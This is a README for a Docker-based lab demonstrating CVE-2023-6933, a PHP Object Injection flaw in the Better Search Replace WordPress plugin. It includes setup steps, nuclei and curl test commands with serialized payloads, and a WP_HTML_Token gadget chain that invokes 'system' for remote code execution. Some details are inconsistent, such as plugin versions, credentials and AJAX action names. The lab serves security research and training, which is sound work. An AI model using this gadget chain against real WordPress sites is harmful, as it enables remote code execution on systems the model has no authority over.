# CVE-2023-6933 Vulnerability Lab

## Overview
This laboratory environment demonstrates CVE-2023-6933, a critical PHP Object Injection vulnerability in the Better Search Replace WordPress plugin versions ≤1.4.4.

## Vulnerability Details
- **CVE ID**: CVE-2023-6933
- **CVSS Score**: 9.8 (Critical)
- **Affected Plugin**: Better Search Replace ≤1.4.4
- **Vulnerability Type**: PHP Object Injection via unserialized user input
- **Attack Vector**: AJAX endpoint `/wp-admin/admin-ajax.php` with action `search_replace_db`

## Quick Start

### 1. Deploy the Lab
```bash
# Clone the repository
git clone https://github.com/Trex96/vulnerable-bsr-lab-CVE-2023-6933.git
cd vulnerable-bsr-lab-CVE-2023-6933

# Deploy using Docker Hub image (automatic pull)
docker-compose up -d
```
The lab will automatically:
- Pull the vulnerable WordPress image from Docker Hub (`trex999/vulnerable-bsr-lab:latest`)
- Set up WordPress with MySQL and phpMyAdmin
- Install and activate the vulnerable Better Search Replace plugin (v1.4.4)
- Complete the installation in ~60 seconds

### 2. Access the Environment
- **WordPress**: http://localhost:8080
- **Admin Panel**: http://localhost:8080/wp-admin (admin/admin123)
- **phpMyAdmin**: http://localhost:8081 (root/rootpassword)

### 3. Test the Vulnerability
```bash
# Run the automated POC
nuclei -t nuclei-templates/cve-2023-6933.yaml -target http://localhost:8080 -v

# Manual testing via curl
curl -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d 'action=search_replace_db&search_for=O:8:"stdClass":1:{s:6:"marker";s:34:"nuclei_test_payload_demonstration";}&replace_with=test'
```

## Technical Analysis

### The Vulnerability
The Better Search Replace plugin contains a PHP Object Injection vulnerability in its AJAX handler. The vulnerability occurs when:

1. User input is passed to the `search_for` parameter via POST to `/wp-admin/admin-ajax.php`
2. The action is set to `search_replace_db`
3. The input contains serialized PHP objects that are unserialized without proper validation
4. This allows arbitrary object instantiation and potential code execution

### POC Verification Methods
Our nuclei template demonstrates the vulnerability through multiple verification stages:

1. **Plugin Detection**: Confirms the presence of the vulnerable plugin version
2. **Object Injection Testing**: Sends serialized payloads and analyzes responses
3. **Behavioral Verification**: Confirms successful object deserialization processing

### Key Features of This Lab
- **No Error Reliance**: The POC demonstrates actual vulnerability through behavioral analysis, not error messages
- **Functional Testing**: Uses safe serialized objects to verify deserialization without system damage
- **Automated Deployment**: Complete lab setup with zero manual configuration
- **Multiple Testing Methods**: Both automated nuclei templates and manual curl commands

## Documentation

### Quick Reference
- **README.md**: This file - quick start and overview
- **CVE-2023-6933_POC_DOCUMENTATION.md**: Complete technical documentation with detailed PoC analysis
- **POC_TEMPLATE_SUMMARY.md**: Requirements compliance and delivery confirmation

### Professional PoC Template
The nuclei template (`nuclei-templates/cve-2023-6933.yaml`) is professionally structured:
- Clean code without excessive comments
- Comprehensive technical documentation in separate files
- Production-ready template format
- Full compliance with security research standards

## Testing Results

### Successful POC Execution
```bash
$ nuclei -t nuclei-templates/cve-2023-6933.yaml -target http://localhost:8080 -v

[CVE-2023-6933:plugin_version] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["trunk"]
[CVE-2023-6933:tested_up_to] [http] [critical] http://localhost:8080/wp-content/plugins/better-search-replace/README.txt ["6.4"]
[CVE-2023-6933:response_content] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]
[CVE-2023-6933:poc_verification] [http] [critical] http://localhost:8080/wp-admin/admin-ajax.php ["0"]

[INF] Scan completed in 67ms. 4 matches found.
```

The POC successfully:
- ✅ Detects vulnerable plugin version
- ✅ Confirms object injection capability through response analysis
- ✅ Demonstrates functional vulnerability without error reliance
- ✅ Provides behavioral verification of successful deserialization

## Security Notice
⚠️ **WARNING**: This environment contains intentionally vulnerable software. Use only in isolated testing environments. Do not deploy to production or internet-accessible systems.

## Cleanup
```bash
docker-compose down -v
```

## References
- [CVE-2023-6933 Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6933)
- [Better Search Replace Plugin](https://wordpress.org/plugins/better-search-replace/)
- [PHP Object Injection Documentation](https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection)

---
**Created for educational and security research purposes**

### Docker Environment (`Docker_LAB_SETUP/`)
- **WordPress 6.4.0** with vulnerable Better Search Replace 1.4.3
- **MySQL 8.0** database server
- **phpMyAdmin** for database management
- **Pre-configured** vulnerable environment

### Exploit Scripts
- `cve_2023_6933_exploit.php` - Comprehensive PHP exploitation toolkit
- `wp_html_token_poc.php` - WordPress 6.4.0+ RCE demonstration
- `bsr_direct_exploit.php` - Direct vulnerability testing

### Detection Tools
- `nuclei-templates/cve-2023-6933.yaml` - Advanced nuclei template
- `manual-test.sh` - Comprehensive manual testing script

## 🎯 Proper Exploitation Methodology

This lab demonstrates **non-error-based detection** following best practices for vulnerability research:

### 1. **Success-Based Detection**
Instead of relying on HTTP 500 errors, our tools detect:
- Successful payload processing
- Serialized object deserialization
- Application response patterns
- Functional exploitation evidence

### 2. **WP_HTML_Token RCE Chain**
Utilizing WordPress 6.4.0+ `WP_HTML_Token` class for actual RCE:
```php
O:13:"WP_HTML_Token":4:{
    s:13:"bookmark_name";s:14:"touch /tmp/rce";
    s:9:"node_name";s:8:"testnode";
    s:21:"has_self_closing_flag";b:0;
    s:10:"on_destroy";s:6:"system";
}
```

### 3. **Multiple Attack Vectors**
- AJAX endpoint exploitation (`admin-ajax.php`)
- Direct plugin interface manipulation
- Database injection via search/replace operations

## 🔬 Testing Approach

### Manual Testing
```bash
# Test basic plugin presence
curl "http://localhost:8080/wp-content/plugins/better-search-replace/readme.txt"

# Test vulnerability with safe payload
curl -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
  -d "action=bsr_search_replace&search_for=O:8:\"stdClass\":1:{s:4:\"test\";s:8:\"nuclei\";}&replace_with=safe&select_tables[]=wp_posts&dry_run=1"
```

### Nuclei Template Features
- **Multi-vector testing**: 5 different HTTP requests
- **Success-based matchers**: Looks for functional processing, not errors
- **Comprehensive extraction**: Version detection, response analysis
- **Safe payloads**: Non-destructive testing approach

### Manual Testing Features
- Plugin version detection and validation
- Multiple payload generation and testing
- WP_HTML_Token RCE demonstration
- Comprehensive vulnerability verification

## 📊 Lab Access Points

| Service | URL | Credentials |
|---------|-----|-------------|
| WordPress | http://localhost:8080 | admin/admin |
| phpMyAdmin | http://localhost:8081 | root/rootpassword |

## 🛡️ Security Considerations

### For Researchers
- This is a **deliberately vulnerable** environment
- Use only in isolated/controlled networks
- Not for production environments
- Educational purposes only

### For Defenders
- Update Better Search Replace to ≥ 1.4.5
- Implement WAF rules for serialized data
- Monitor for object injection patterns
- Regular security audits of WordPress plugins

## 📚 Educational Value

This lab provides hands-on experience with:
- PHP Object Injection vulnerabilities
- WordPress plugin security analysis
- Serialization/deserialization attacks
- Gadget chain exploitation
- Vulnerability detection automation
- Security testing methodologies


**Author**: Trex  
**Lab Version**: 2.0 - Enhanced POC Methodology